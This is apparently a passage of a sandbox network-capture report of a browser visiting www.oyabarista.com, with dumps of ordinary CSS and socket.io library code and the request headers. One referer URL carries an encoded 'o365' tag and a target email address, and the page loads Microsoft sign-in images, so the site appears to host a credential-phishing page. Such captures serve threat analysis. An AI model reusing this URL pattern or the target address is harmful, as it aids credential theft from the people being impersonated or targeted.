                                                        2025-03-27 13:41:25 UTC1369INData Raw: 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34
                                                        Data Ascii: sx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4
                                                        2025-03-27 13:41:25 UTC1369INData Raw: 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64
                                                        Data Ascii: a-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-d
                                                        2025-03-27 13:41:25 UTC1369INData Raw: 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e
                                                        Data Ascii: -animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infin
                                                        2025-03-27 13:41:25 UTC1369INData Raw: 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69
                                                        Data Ascii: direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animation-duration,1s);-webkit-animation-iteration-count:var(--fa-animation-iteration-count,i
                                                        2025-03-27 13:41:25 UTC1369INData Raw: 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 7d 2e 66 61 2d 73 70 69 6e 2d
                                                        Data Ascii: t:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animation-timing,linear);animation-timing-function:var(--fa-animation-timing,linear)}.fa-spin-
                                                        2025-03-27 13:41:25 UTC1369INData Raw: 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65 62 6b 69
                                                        Data Ascii: );transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@-webkit-keyframes fa-bounce{0%{-webki
                                                        2025-03-27 13:41:25 UTC1369INData Raw: 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 33 30 25 7b 2d 77 65
                                                        Data Ascii: 0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0)}30%{-we
                                                        2025-03-27 13:41:25 UTC1369INData Raw: 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d
                                                        Data Ascii: ade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}
                                                        2025-03-27 13:41:25 UTC1369INData Raw: 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d 31 32 25 2c 32 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 7d 31 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d
                                                        Data Ascii: sform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,24%{-webkit-transform:rotate(-18deg);transform:rotate(-18deg)}12%,28%{-webkit-transform:rotate(18deg);transform:rotate(18deg)}16%{-webkit-transform


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.54974023.44.201.1644436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:25 UTC588OUTGET /w3css/4/w3.css HTTP/1.1
                                                        Host: www.w3schools.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:25 UTC507INHTTP/1.1 200 OK
                                                        Content-Type: text/css
                                                        Last-Modified: Tue, 25 Mar 2025 12:41:02 GMT
                                                        ETag: "0c3af2a839ddb1:0"
                                                        Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                        X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                        Cache-Control: public, max-age=31361306
                                                        Expires: Wed, 25 Mar 2026 13:09:51 GMT
                                                        Date: Thu, 27 Mar 2025 13:41:25 GMT
                                                        Content-Length: 23427
                                                        Connection: close
                                                        2025-03-27 13:41:25 UTC15877INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                                        Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                                        2025-03-27 13:41:25 UTC7550INData Raw: 7d 0a 2f 2a 20 43 6f 6c 6f 72 73 20 2a 2f 0a 2e 77 33 2d 61 6d 62 65 72 2c 2e 77 33 2d 68 6f 76 65 72 2d 61 6d 62 65 72 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 63 31 30 37 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 61 71 75 61 2c 2e 77 33 2d 68 6f 76 65 72 2d 61 71 75 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f
                                                        Data Ascii: }/* Colors */.w3-amber,.w3-hover-amber:hover{color:#000!important;background-color:#ffc107!important}.w3-aqua,.w3-hover-aqua:hover{color:#000!important;background-color:#00ffff!important}.w3-blue,.w3-hover-blue:hover{color:#fff!important;background-co


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.5497423.168.73.274436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:25 UTC577OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                        Host: cdn.socket.io
                                                        Connection: keep-alive
                                                        Origin: https://www.oyabarista.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:25 UTC748INHTTP/1.1 200 OK
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Content-Length: 49993
                                                        Connection: close
                                                        Accept-Ranges: bytes
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=31536000, immutable
                                                        Content-Disposition: inline; filename="socket.io.min.js"
                                                        Date: Thu, 13 Mar 2025 10:22:03 GMT
                                                        ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                        Last-Modified: Sat, 11 Jan 2025 01:43:43 GMT
                                                        Server: Vercel
                                                        Strict-Transport-Security: max-age=63072000
                                                        X-Vercel-Cache: HIT
                                                        X-Vercel-Id: iad1::dr4kf-1741861323405-f939464a14b6
                                                        X-Cache: Hit from cloudfront
                                                        Via: 1.1 dc7aeefd8f9f1132c56cbdea9095671e.cloudfront.net (CloudFront)
                                                        X-Amz-Cf-Pop: JFK50-P9
                                                        X-Amz-Cf-Id: 2c8OR2q2AFi1nL42S3xOgd8RQjE5kOFwWlehPVzqxVyHr3oQsQr6KA==
                                                        Age: 6523061
                                                        2025-03-27 13:41:25 UTC15636INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                        Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                        2025-03-27 13:41:25 UTC16384INData Raw: 29 7d 29 2c 30 29 29 7d 2c 72 2e 73 65 6e 64 28 74 68 69 73 2e 64 61 74 61 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68
                                                        Data Ascii: )}),0))},r.send(this.data)}catch(e){return void this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xh
                                                        2025-03-27 13:41:25 UTC16384INData Raw: 3f 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 3a 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 2c 6e 73 70 3a 65 2e 6e 73 70 2c 64 61 74 61 3a 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69
                                                        Data Ascii: ?Be.BINARY_EVENT:Be.BINARY_ACK,nsp:e.nsp,data:e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.i
                                                        2025-03-27 13:41:25 UTC1589INData Raw: 2e 64 75 72 61 74 69 6f 6e 28 29 3b 74 68 69 73 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 30 3b 76 61 72 20 72 3d 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e
                                                        Data Ascii: .duration();this._reconnecting=!0;var r=this.setTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.549731104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:26 UTC695OUTGET /favicon.ico HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:41:27 UTC430INHTTP/1.1 302 Found
                                                        Date: Thu, 27 Mar 2025 13:41:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Server: cloudflare
                                                        Link: <https://www.oyabarista.com/wp-json/>; rel="https://api.w.org/"
                                                        X-Redirect-By: WordPress
                                                        Location: https://www.oyabarista.com/wp-includes/images/w-logo-blue-white-bg.png
                                                        Cf-Cache-Status: BYPASS
                                                        CF-RAY: 926f4e280fe3d2b1-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-27 13:41:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.54975223.209.72.94436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:41:26 UTC703OUTGET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1
                                                        Host: aadcdn.msftauth.net
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
